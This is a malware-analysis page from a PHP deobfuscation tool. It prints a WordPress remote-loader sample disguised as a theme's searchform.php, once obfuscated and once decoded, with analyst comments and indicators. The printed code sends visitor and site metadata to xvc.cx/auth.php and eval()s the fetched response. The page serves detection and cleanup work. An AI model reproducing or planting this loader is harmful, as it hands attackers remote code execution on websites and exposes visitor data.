
PHP deobfuscation, decryption, reconstruction tool

Deobfuscates PHP malware, viruses and tampered code found on WordPress sites back into readable code.

*Please note that not every obfuscation scheme can be decoded.

The code below was decoded.

<?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64...



Obfuscated PHP code

<?php


/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 



// ANALYST NOTES (comments only; the sample below is unchanged).
//
// The docblock above is part of the sample. Nothing in this file renders a
// search form; the header only makes the file look like a theme template.
//
// Obfuscation techniques visible in the statement run below:
//   * $EisCC is a character lookup table. Sensitive strings are assembled one
//     character at a time by index, e.g. [64].[7].[26].[57].[26].[64] spells
//     the host "xvc.cx" and [61].[2].[2].[65].[18].[61].[39].[37].[2] spells
//     "HTTP_HOST", so neither appears literally in the file.
//   * $GKotnoU holds the string 'base64_decode' and is called as a variable
//     function, so the decoder is never invoked by name.
//   * 'Y3'.'Vy'.'bF9p'.'bm'.'l0' is a split base64 literal that decodes to
//     "curl_init"; it is only used for a function_exists() probe.
//   * cURL options are given as raw integers rather than CURLOPT_* constants
//     (10023 HTTPHEADER, 10002 URL, 19913 RETURNTRANSFER, 64 SSL_VERIFYPEER,
//     52 FOLLOWLOCATION, 42 HEADER).
//
// Behaviour: each time the file runs it sends a GET to http://xvc.cx/auth.php
// with a "Cookie:" header carrying ip=, ua=, host= and req= fields taken from
// $_SERVER, applies str_rot13() and then base64_decode() to the response, and
// eval()s the result when it contains the marker 'fa704e7366d666bd'.
//
// Detection pointers grounded in this listing: the literal marker string, the
// lookup-table string itself, "auth.php" next to eval(), and a variable
// function applied to str_rot13() output. The host name is NOT greppable in
// this form because it is built from table indexes.
$EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64_decode';$vXKzarSqz = $EisCC[64].$EisCC[7].$EisCC[26].$EisCC[57].$EisCC[26].$EisCC[64];$UlfmeWlz = "auth.php";$dsH = "http://";$dsH .= $vXKzarSqz;$dsH .= '/';$dsH .= $UlfmeWlz;$agkH = urlencode((isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER[$EisCC[65].$EisCC[5].$EisCC[58]]));$PYBFUMzJv = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[61].$EisCC[39].$EisCC[37].$EisCC[2]];$rDd = $_SERVER["SCRIPT_NAME"];if (isset($_SERVER['HTTP_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];elseif(isset($_SERVER['HTTP_X_FORWARDED'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];elseif(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]];elseif(isset($_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]];else $PLxAVm = 
'UNKNOWN';$yVmUFDc = $EisCC[56].$EisCC[67].$EisCC[67].$EisCC[22].$EisCC[45].$EisCC[52].$EisCC[44].$EisCC[48].$EisCC[16].$EisCC[45].$EisCC[20].$EisCC[68].$PLxAVm.$EisCC[16].$EisCC[38].$EisCC[28].$EisCC[68].$agkH.$EisCC[16].$EisCC[17].$EisCC[67].$EisCC[4].$EisCC[31].$EisCC[68].$PYBFUMzJv.';req='.$rDd.';';$AFCLFaeBi = array('http'=>array('method'=>'GET', 'header'=>$yVmUFDc));if( function_exists($GKotnoU('Y3'.'Vy'.'bF9p'.'bm'.'l0')) ) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc),10002 => $dsH,19913 => 1,64 => false,52 => true,42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK);}else { $ttekHhTRK2 = @file_get_contents($dsH,false,stream_context_create($AFCLFaeBi)); }$ttekHhTRK2 = str_rot13($ttekHhTRK2);$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);if(stripos($ttekHhTRK2,'fa704e7366d666bd')!==FALSE) eval($ttekHhTRK2);

?>

Decoded (deobfuscated) PHP code

<?php

/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
// ANALYST NOTES (comments only; the decoded code is unchanged).
//
// Summary: a remote loader. Each time this file runs it reports request
// metadata to http://xvc.cx/auth.php in a Cookie header, decodes the response
// body (ROT13, then base64) and eval()s it when it contains a fixed marker.
// The template docblock above belongs to the sample; nothing below renders a
// search form.
//
// Indicators visible in this listing: host "xvc.cx", path "/auth.php", marker
// string "fa704e7366d666bd", and an outbound request whose Cookie header has
// the fields ip=, ua=, host= and req=.

// Character lookup table: strings the author wanted to hide are assembled
// from it by index (see the Cookie header construction further down).
$EisCC = "n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";
// Function name kept in a variable so base64_decode is only ever called
// indirectly, as $GKotnoU(...).
$GKotnoU = 'base64_decode';
// Remote host and script that supply the code to execute.
$vXKzarSqz = "xvc.cx";
$UlfmeWlz = "auth.php";
// The next four assignments are the decoder's step-by-step rendering of the
// URL being built; only the last value is used.
$dsH = "http://";
$dsH = "http://xvc.cx";
$dsH = "http://xvc.cx/";
$dsH = "http://xvc.cx/auth.php";
// URL-encoded User-Agent of the visitor; falls back to $_SERVER["PWD"] when
// no User-Agent is present (presumably the process working directory —
// depends on the SAPI/environment, not shown here).
$agkH = urlencode(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER["PWD"]);
// Host name the compromised site was requested under.
$PYBFUMzJv = $_SERVER["HTTP_HOST"];
// Path of the script being executed on the compromised site.
$rDd = $_SERVER["SCRIPT_NAME"];
// Visitor address. Request-header values (HTTP_*) are preferred over
// REMOTE_ADDR, so the reported value is whatever the client or an
// intermediate proxy put in those headers; REMOTE_ADDR is only the last
// resort before 'UNKNOWN'.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
} elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_FORWARDED"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED"];
} elseif (isset($_SERVER["REMOTE_ADDR"])) {
    $PLxAVm = $_SERVER["REMOTE_ADDR"];
} else {
    $PLxAVm = 'UNKNOWN';
}
// Resolving the table indexes gives the request header
//   "Cookie: ;ip=<address>;ua=<user agent>;host=<HTTP_HOST>;req=<SCRIPT_NAME>;"
// i.e. the visitor and site metadata collected above is sent to the remote
// host disguised as a cookie. Only the user agent is URL-encoded; the other
// three values are concatenated as received.
$yVmUFDc = $EisCC[56] . $EisCC[67] . $EisCC[67] . $EisCC[22] . $EisCC[45] . $EisCC[52] . $EisCC[44] . $EisCC[48] . $EisCC[16] . $EisCC[45] . $EisCC[20] . $EisCC[68] . $PLxAVm . $EisCC[16] . $EisCC[38] . $EisCC[28] . $EisCC[68] . $agkH . $EisCC[16] . $EisCC[17] . $EisCC[67] . $EisCC[4] . $EisCC[31] . $EisCC[68] . $PYBFUMzJv . ';req=' . $rDd . ';';
// Stream context for the non-cURL fallback: same GET request, same header.
$AFCLFaeBi = array('http' => array('method' => 'GET', 'header' => $yVmUFDc));
// 'Y3VybF9pbml0' is base64 for "curl_init": use cURL when the extension is
// available, otherwise fall back to file_get_contents().
if (function_exists($GKotnoU('Y3VybF9pbml0'))) {
    $ttekHhTRK = curl_init();
    // Options are raw integers instead of CURLOPT_* constants:
    //   10023 CURLOPT_HTTPHEADER      (the Cookie header built above)
    //   10002 CURLOPT_URL             (http://xvc.cx/auth.php)
    //   19913 CURLOPT_RETURNTRANSFER  (return the body instead of printing it)
    //   64    CURLOPT_SSL_VERIFYPEER  = false (certificate checks disabled)
    //   52    CURLOPT_FOLLOWLOCATION  = true  (redirects are followed)
    //   42    CURLOPT_HEADER          = false (response headers not included)
    $DGxuu = array(10023 => array($yVmUFDc), 10002 => $dsH, 19913 => 1, 64 => false, 52 => true, 42 => false);
    curl_setopt_array($ttekHhTRK, $DGxuu);
    $ttekHhTRK2 = curl_exec($ttekHhTRK);
    curl_close($ttekHhTRK);
} else {
    // '@' suppresses warnings, so a failed fetch leaves no PHP error output.
    $ttekHhTRK2 = @file_get_contents($dsH, false, stream_context_create($AFCLFaeBi));
}
// Response decoding: ROT13 first, then base64 (via the variable function).
$ttekHhTRK2 = str_rot13($ttekHhTRK2);
$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);
// The decoded response is executed as PHP when it contains the marker. The
// check is a case-insensitive substring test, not a signature: it does not
// authenticate the sender, and the fetch is over plain http://. Because the
// payload is whatever the remote host returns at request time, this file
// alone does not show what code ran; removing the file does not undo it.
// Web-server and egress/proxy logs for requests to the host above are the
// place to look for how often and since when the loader fired.
if (stripos($ttekHhTRK2, 'fa704e7366d666bd') !== FALSE) {
    eval($ttekHhTRK2);
}

